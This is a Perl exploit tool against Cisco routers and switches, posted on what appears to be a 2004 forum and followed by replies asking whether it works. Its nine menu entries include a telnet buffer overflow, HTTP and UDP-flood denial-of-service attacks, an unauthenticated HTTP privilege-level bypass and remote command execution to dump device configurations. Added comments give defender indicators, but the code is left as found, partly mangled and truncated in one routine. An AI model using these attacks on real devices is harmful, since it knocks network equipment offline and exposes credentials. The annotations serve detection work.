# usage -- print the command-line synopsis and the numbered menu of checks
# ([1] through [9]) to STDOUT, then terminate the process with exit status 1.
# The text is fixed; nothing is interpolated and no arguments are read.
sub usage {
    # Single-quoted heredoc: emitted byte-for-byte, no interpolation.
    print <<'END_USAGE';

Usage :
perl cge.pl -h <host> -v <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability

END_USAGE
    exit(1);
}
# cisco1 -- menu entry [1], "Cisco 677/678 Telnet Buffer Overflow".
#
# What the visible code does:
#   * takes the target from the file-level $host (not declared in this block);
#   * builds one input line by repeating the fixed pattern in $dch $num (30000)
#     times and terminates it with CR LF ("\015\012");
#   * opens a TCP connection with PeerPort "(23)" (the die text calls it the
#     telnet server), writes the line, and echoes whatever the peer returns
#     until the peer closes the connection;
#   * waits three seconds in total, then attempts a second connection to the
#     same port. A failed second connect is reported as "server is down";
#     otherwise "still up" is printed. Every path ends the process
#     (die, or exit(1)).
#
# Defender notes:
#   * On the wire this is a single, very large pre-authentication line on the
#     telnet management port, followed a few seconds later by a bare TCP
#     connect from the same source. Oversized telnet input followed by the
#     management port becoming unreachable is the pattern to alert on.
#   * The "down"/"up" verdict is only a TCP reachability test; a filtered or
#     rate-limited port gives the same result as a crashed device.
#   * General mitigation for this class: restrict telnet management to trusted
#     networks and run vendor-fixed firmware -- confirm specifics against the
#     vendor advisory; none is cited on this page.
#
# NOTE(review): as extracted, the `#` comment on the `sub` line runs to the end
# of the line and so swallows the opening `{` and the first statements; the
# original listing presumably had a line break after the comment. The code
# lines below are left exactly as found.
# NOTE(review): `my $string .= ...` appends to a freshly declared (undef)
# scalar; plain `=` would express the same thing.
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability { my $serv = $host; my $dch = "?????????????????a~ %%%%%XX%%%%%"; my $num = 30000; my $string .= $dch x $num; my $shc="\015\012";
my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("No telnet server detected on $serv ...\n\n");
$sockd->autoflush(1); print $sockd "$string". $shc; while (<$sockd>){ print } print("\nPacket sent ...\n"); sleep(1); print("Now checking server's status ...\n"); sleep(2);
# Second connect is the only "result" signal the script has.
my $sockd2 = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("Vulnerability successful exploited. Target server is down ...\n\n");
print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); }
# cisco2 -- menu entry [2], "Cisco IOS Router Denial of Service".
#
# What the visible code does:
#   * takes the target from the file-level $host;
#   * connects over TCP with PeerPort "http(80)" and sends the single request
#     "GET /%% HTTP/1.0" followed by a blank line (the `\%` escapes in the
#     Perl string yield literal `%` characters);
#   * closes the socket, waits three seconds in total, opens a second
#     connection, and prints a verdict before exit(1).
#
# Defender notes:
#   * The request line `GET /%%` against a device's HTTP management interface
#     is the log/IDS indicator for this check.
#   * The printed verdict is not evidence either way: the second `unless`
#     tests $sockd (the first socket, already known to be true at that point)
#     rather than $sockd2, so the "Target server is down" branch cannot be
#     reached after a successful first connect and "still up" is always
#     printed. Do not use this output to confirm that a device is patched.
#   * General mitigation for this class: disable the HTTP management server
#     where it is not needed, or restrict it to trusted management hosts.
#
# NOTE(review): as extracted, the `#` comment on the `sub` line swallows the
# opening `{` and `my $serv = $host;`. The `-` in front of `close $sockd`
# looks like diff or extraction residue; as written it is a unary minus
# applied to close()'s return value. Code lines are left exactly as found.
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host;
my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2);
my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};
print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); }
# cisco3 -- menu entry [3], "Cisco IOS HTTP Auth".
#
# What the visible code does:
#   * resolves the file-level $host with inet_aton and fixes the port at 80;
#   * for $n from 16 up to 99 sends "GET /level/<n>/exec/- HTTP/1.0" through
#     the nested exploit() helper, lowercases every response line, and sets
#     $fg to 1 on "http/1.0 401 unauthorized" or back to 0 on
#     "http/1.0 200 ok";
#   * after a two-second sleep prints a per-level result; the loop stops at
#     the first level for which $fg is 0, and the sub ends with exit(1).
#
# Defender notes:
#   * In web/management logs this appears as sequential requests for
#     /level/16/exec/- , /level/17/exec/- , ... from one source, spaced about
#     two seconds apart. A 200 response to any of them from an
#     unauthenticated client is the finding that matters.
#   * $fg starts at 0 and is only raised by an exact 401 status line, so a
#     first response carrying neither status (for example another status
#     code, or HTTP/1.1) is reported as "successful". Treat a positive result
#     as unconfirmed until the response itself has been inspected.
#   * General mitigation for this class: disable the HTTP management server
#     or restrict it to trusted hosts, and run vendor-fixed software --
#     confirm against the vendor advisory; none is cited on this page.
#
# NOTE(review): as extracted, the `#` comment on the `sub` line swallows the
# opening `{` and the variable declarations. $line is used without `my`
# (package global). Code lines are left exactly as found.
sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0;
LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} }
if ($fg==1) { sleep(2); print "Vulnerability unsuccessful exploited with $n ...\n\n\r"; } else { sleep(2); print "Vulnerability successful exploited with $n ...\n\n\r"; last LAB; }
$n++;
# exploit($request) -- sends one request string over a fresh TCP connection on
# the bareword handle S and returns the response lines as a list; dies if the
# socket cannot be created or the connect fails.
# NOTE(review): this is a named sub written inside the loop body of cisco3 and
# it reads $port, $target and $serv from the enclosing sub; named subs are not
# re-created per call, so this relies on Perl's closure behaviour for nested
# named subs -- verify. The sockaddr is packed by hand with family value 2
# (presumably AF_INET -- platform-dependent, confirm).
sub exploit { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Unable to initialize socket ...\n\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("No http server detected on $serv ...\n\n"); } } } exit(1); }
# cisco4 -- menu entry [4], "Cisco IOS HTTP Configuration Arbitrary
# Administrative Access".
#
# What the visible code does:
#   * takes the target from the file-level $host and starts $n at 16;
#   * for $n below 100 calls exploit1() with "GET /level/<n>/exec/- HTTP/1.0",
#     strips newlines from $wr and tests it for "200 ok";
#   * on a match, prints a three-option menu and reads the operator's choice
#     from STDIN into $vuln.
#
# NOTE(review): this listing is truncated. The page cuts off after
# `chomp($vuln);` -- the blocks opened here are never closed, the handling of
# the menu choice is not shown, and the subs for menu entries [5] and [6] do
# not appear on the page at all. exploit1() and $wr are not defined anywhere
# in the visible text; presumably exploit1 stores the response in $wr --
# confirm against a complete copy. As extracted, the `#` comment on the `sub`
# line also swallows the opening `{` and the declarations.
#
# Defender notes: the probe pattern is sequential requests to
# /level/<n>/exec/- on the HTTP management interface; an unauthenticated 200
# response to any of them is the condition this code looks for. Disabling the
# HTTP management server or restricting it to trusted hosts removes the
# exposure.
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability { my $serv = $host; my $n = 16;
while ($n <100) { exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); $wr =~ s/\n//g; if ($wr =~ /200 ok/) { while(1) { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; print "[1] Banner change\n"; print "[2] List vty 0 4 acl info\n"; print "[3] Other\n"; print "Enter a valid option [ 1 - 2 - 3 ] : "; $vuln = <STDIN>; chomp($vuln);
# cisco7 -- menu entry [7], "Cisco Catalyst 3500 XL Remote Arbitrary Command".
#
# What the visible code does:
#   * takes the target from the file-level $host, port fixed at 80;
#   * prompts on STDIN for a path; an empty answer selects the default
#     "/show/config/cr";
#   * builds "GET /exec<path> HTTP/1.0" (the typed text is appended to /exec
#     unmodified), stores it in the undeclared global $vuln, sends it over one
#     TCP connection and prints every line the device returns, then exit(1).
#
# Defender notes:
#   * The indicator is any request whose path begins with /exec on the
#     switch's HTTP management interface from a client that has not
#     authenticated. The default path suggests the response would carry the
#     device configuration, so a 200 here should be handled as a disclosure
#     of configuration data (credentials, community strings) -- confirm
#     against the device's actual response.
#   * There is no success/failure logic: the script only echoes the response,
#     and "Packet sent ..." is printed before the request is written.
#   * General mitigation for this class: disable the HTTP management server
#     or restrict it to trusted management hosts, and run vendor-fixed
#     software.
#
# NOTE(review): as extracted, the `#` comment on the `sub` line swallows the
# opening `{` and the declarations. Code lines are left exactly as found.
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability { my $serv = $host; my $port = 80; my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : "; $k = <STDIN>; chomp ($k); if ($k eq "") {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} else {$vuln = "GET /exec$k HTTP/1.0\n\n";}
my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n";
print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); }
# cisco8 -- menu entry [8], "Cisco IOS Software HTTP Request Denial of
# Service".
#
# What the visible code does:
#   * takes the target from the file-level $host, port fixed at 80;
#   * sends the single request "GET /error?/ HTTP/1.0" followed by a blank
#     line over one TCP connection;
#   * waits two seconds, prints whatever the device returns, closes the socket
#     and ends with exit(1).
#
# Defender notes:
#   * The request line `GET /error?/` against a device's HTTP management
#     interface is the log/IDS indicator for this check.
#   * Unlike the other denial-of-service entries in this file, there is no
#     follow-up connection: the script gives no indication of whether the
#     device stayed up, so availability has to be verified independently.
#   * "Packet sent ..." is printed before the request is actually written.
#   * General mitigation for this class: disable the HTTP management server
#     where it is not needed, or restrict it to trusted management hosts.
#
# NOTE(review): as extracted, the `#` comment on the `sub` line swallows the
# opening `{` and the declarations, including the `my $vuln` that the later
# lines use. Code lines are left exactly as found.
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n";
my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n";
print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); }
# cisco9 -- menu entry [9], "Cisco 514 UDP Flood Denial of Service".
#
# What the visible code does:
#   * takes the target from the file-level $host and fixes the UDP port at 514;
#   * creates a datagram socket (protocol number 17) on the bareword handle SS
#     and calls send() 10000 times towards that port;
#   * then asks the operator on STDIN for a TCP port known to be open on the
#     target, attempts one TCP connect to it, and reports "down" if the
#     connect fails or "still up" otherwise, ending with exit(1).
#
# Defender notes:
#   * The indicator is a burst of 10000 UDP datagrams to port 514 from a
#     single source in a tight loop, followed a few seconds later by one TCP
#     connect to an unrelated port.
#   * The verdict is a reachability test on an operator-supplied port; a
#     filtered port or a mistyped number reads as "down".
#   * General mitigation for this class: filter or rate-limit UDP 514 towards
#     network devices from untrusted networks and run vendor-fixed software.
#
# NOTE(review): in `send(SS, 0, $size, ...)` the message argument is the
# literal 0 and $size (an empty string) sits in the FLAGS position, so the
# datagram payload is not controlled by $size as the name suggests -- verify
# the intent. The return value of the first socket() call is not checked.
# As extracted, the `#` comment on the `sub` line swallows the opening `{` and
# the declarations. Code lines are left exactly as found.
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = "";
socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++) {send(SS, 0, $size, sockaddr_in($port, $iaddr));}
printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";
printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); }
wizy
Mar 25 2004, 07:16 PM
note: this is not my code, all credit to The BlackAngels
H4xorHunt3r
Apr 1 2004, 02:25 PM
wizy, or anyone else for that matter, have you tried running the Black Angels' perl scripts to see if they work correctly? I am very interested in knowing if they work, but do not have a Cisco IOS box to run it against in a lab environment. Cheers,
tolf
Apr 2 2004, 12:48 AM
QUOTE (H4xorHunt3r @ Apr 1 2004, 02:25 PM)
wizy, or anyone else for that matter, have you tried running the Black Angels' perl scripts to see if they work correctly? I am very interested in knowing if they work, but do not have a Cisco IOS box to run it against in a lab environment. Cheers,
A lot of these vulnerabilities have been around for a while and work fine...
All the Black Angels did was put them into a complete menu-driven script... But good work nevertheless.
hidden
Apr 4 2004, 10:51 AM
Did anyone manage to compile it ????
BlaStA
Apr 4 2004, 10:57 AM
QUOTE (wizy @ Mar 25 2004, 08:15 PM)
#!/usr/bin/perl
What do you think this means? YES, IT'S PERL! Is perl compiled? NO, IT'S INTERPRETED!